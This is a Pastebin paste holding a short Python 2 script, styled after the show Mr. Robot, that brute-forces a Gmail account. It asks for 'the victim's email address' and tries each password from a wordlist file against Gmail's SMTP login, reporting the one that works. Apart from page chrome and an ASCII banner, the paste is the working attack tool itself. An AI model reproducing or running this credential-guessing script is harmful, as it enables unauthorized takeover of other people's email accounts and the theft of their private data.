Advertisement
XwoLfTn

Untitled

Apr 27th, 2018
109
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.77 KB | None | 0 0
  1. # ___. .__
  2. # ____________ ____\_ |__ ____ | | _____
  3. # / \_ __ \ _/ __ \| __ \ / _ \| | \__ \
  4. # | Y Y \ | \/ \ ___/| \_\ ( <_> ) |__/ __ \_
  5. # |__|_| /__| /\___ >___ /\____/|____(____ /
  6. # \/ \/ \/ \/ \/
  7. # .___
  8. # ___________ ______ ________ _ _____________ __| _/
  9. # \____ \__ \ / ___// ___/\ \/ \/ / _ \_ __ \/ __ |
  10. # | |_> > __ \_\___ \ \___ \ \ ( <_> ) | \/ /_/ |
  11. # | __(____ /____ >____ > \/\_/ \____/|__| \____ |
  12. # |__| \/ \/ \/ \/
  13. # __
  14. # ________________ ____ | | __ ___________
  15. # _/ ___\_ __ \__ \ _/ ___\| |/ // __ \_ __ \
  16. # \ \___| | \// __ \\ \___| <\ ___/| | \/
  17. # \___ >__| (____ /\___ >__|_ \\___ >__|
  18. # \/ \/ \/ \/ \/
  19.  
  20.  
  21. import smtplib
  22.  
  23. class bcolors:
  24. OK = '\033[92m'
  25. FAIL = '\033[91m'
  26. BOLD = '\033[1m'
  27. ENDC = '\033[0m'
  28. UNDERLINE = '\033[4m'
  29.  
  30. smtpserver = smtplib.SMTP("smtp.gmail.com", 587)
  31. smtpserver.ehlo()
  32. smtpserver.starttls()
  33.  
  34. print bcolors.BOLD + "Welcome to, mr.ebola Email Cracker based on MR.ROBOT - S01E01 11m03s" + bcolors.ENDC
  35. print bcolors.BOLD + "TRYING WITH PASSWORDS IN: psw.list" + bcolors.ENDC
  36.  
  37. user = raw_input("Enter the victim's email address: ")
  38. passwfile = "psw.list"
  39. passwfile = open(passwfile, "r")
  40.  
  41. for password in passwfile:
  42. try:
  43. smtpserver.login(user, password)
  44. print bcolors.UNDERLINE + "Password Found: %s" % password + bcolors.ENDC
  45. break;
  46. except smtplib.SMTPAuthenticationError:
  47. print bcolors.FAIL + "Password Incorrect: %s" % password + bcolors.ENDC
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement